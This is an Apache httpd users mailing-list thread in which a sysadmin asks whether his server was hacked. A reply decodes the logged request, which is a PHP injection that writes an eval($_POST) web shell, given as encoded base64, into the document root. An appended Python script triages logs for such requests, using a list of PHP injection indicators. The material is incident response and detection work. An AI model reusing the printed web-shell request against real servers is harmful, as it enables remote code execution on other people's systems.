From: Jack Swan
Date: Mon, 6 Feb 2017 08:36:40 -0800 (PST)
Subject: Re: [users@httpd] am i hacked ?
Delivered-To: mailing list users@httpd.apache.org
Message-ID: <6eafa535-9eff-4729-8e4c-e27e2d91f199@default>

I didn't decode it all. I'll leave the rest up to you, but the %characters are hexadecimal characters. Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

----- Original Message -----
From: bernd.lentes@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means it was successful. The IP is from Ukraine.
Where can I find out what these %characters mean? Does anyone understand what happened here?
It's Apache 2.2.3 64bit.

Thanks for any hint.

Bernd

--
Bernd Lentes
System administration
Institute of Developmental Genetics
Building 35.34 - Room 208
HelmholtzZentrum München
bernd.lentes@helmholtz-muenchen.de
phone: +49 (0)89 3187 1241
fax: +49 (0)89 3187 2294

Only once you commit to something can you be wrong
Scott Adams

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Chair of the Supervisory Board: MinDir'in Baerbel Brumme-Bothe
Managing Directors: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Court of registration: Amtsgericht Muenchen HRB 6466
VAT ID no.: DE 129521671

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
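The decoding Jack describes, carried out end to end as an added example that is not part of this thread and not code from the Apache project or either poster: a small Python triage script that parses access_log lines in the shape shown above, URL-decodes the query string, decodes every base64 literal handed to base64_decode(), extracts the file the payload tries to write under DOCUMENT_ROOT, and flags the request when PHP code-injection markers appear. The two suspicious log lines are copied from Bernd's mail with the mail wrapping removed; the third, benign line, the document root /var/www/html, and the log layout (one extra numeric field between the timestamp and the request, presumably a custom LogFormat) are assumptions made for the example.

```python
import base64
import os
import re
from urllib.parse import unquote_plus

# The URL-encoded query value from the two log lines in the thread (mail wrapping removed).
ENCODED_PAYLOAD = (
    "%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B"
    "%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28"
    "%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28"
    "%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B"
)

# Sample input: Bernd's two requests plus one constructed benign request.
SAMPLE_LOG = (
    f'91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1={ENCODED_PAYLOAD} HTTP/1.1" 200 90\n'
    f'91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1={ENCODED_PAYLOAD} HTTP/1.1" 200 90\n'
    '192.0.2.10 - - [06/Feb/2017:16:50:01 +0100] 12 "GET /index.html HTTP/1.1" 200 1234\n'
)

# Common log format with an optional extra numeric field before the request (assumed
# custom LogFormat, matching the lines in the thread).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\](?: \d+)? '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Substrings that, in a decoded query string or in decoded base64 content, mark the
# request as attempted PHP code injection rather than an ordinary parameter value.
PHP_INDICATORS = (
    "eval(", "base64_decode(", "file_put_contents(", "system(", "shell_exec(",
    "passthru(", "assert(", "$_POST", "$_GET", "$_REQUEST", "@ini_set(",
)

B64_ARG_RE = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
DROP_RE = re.compile(r"file_put_contents\(\$_SERVER\['DOCUMENT_ROOT'\]\s*\.\s*'([^']+)'")


def decode_base64_args(php_source):
    """Decode every base64 literal passed to base64_decode('...') in decoded PHP text."""
    decoded = []
    for literal in B64_ARG_RE.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append("<undecodable base64: %s>" % literal)
    return decoded


def analyze_line(line):
    """Parse one access_log line; return a finding dict, or None if the line does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded_query = unquote_plus(query)  # %XX -> byte, '+' -> space
    payloads = decode_base64_args(decoded_query)
    searchable = decoded_query + "\n" + "\n".join(payloads)
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "path": path,
        "decoded_query": decoded_query,
        "embedded_payloads": payloads,
        "dropped_files": DROP_RE.findall(decoded_query),
        "indicators": [i for i in PHP_INDICATORS if i in searchable],
    }


def triage(log_text):
    """Return findings for every parseable line that carries at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        f = analyze_line(line)
        if f and f["indicators"]:
            findings.append(f)
    return findings


def dropped_paths(findings, document_root):
    """Absolute paths the flagged requests tried to create, deduplicated, for checking on disk."""
    paths = []
    for f in findings:
        for rel in f["dropped_files"]:
            p = os.path.join(document_root, rel.lstrip("/"))
            if p not in paths:
                paths.append(p)
    return paths


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['time']} status={f['status']} indicators={f['indicators']}")
        print("  decoded query:", f["decoded_query"])
        for p in f["embedded_payloads"]:
            print("  base64 content:", p)
    # /var/www/html is an assumed document root; substitute the server's real one.
    for p in dropped_paths(hits, "/var/www/html"):
        print("check on disk:", p, "(present)" if os.path.exists(p) else "(absent)")
```

The status code alone does not answer Bernd's question: a request for / with an unused query string gets 200 from any ordinary index page, and the decoded PHP only runs if some script on the server already hands parameter 1 to eval. The decisive check is whether the file named by dropped_paths() now exists under the document root; if it does, the host is compromised and the log line is the timestamp of the drop.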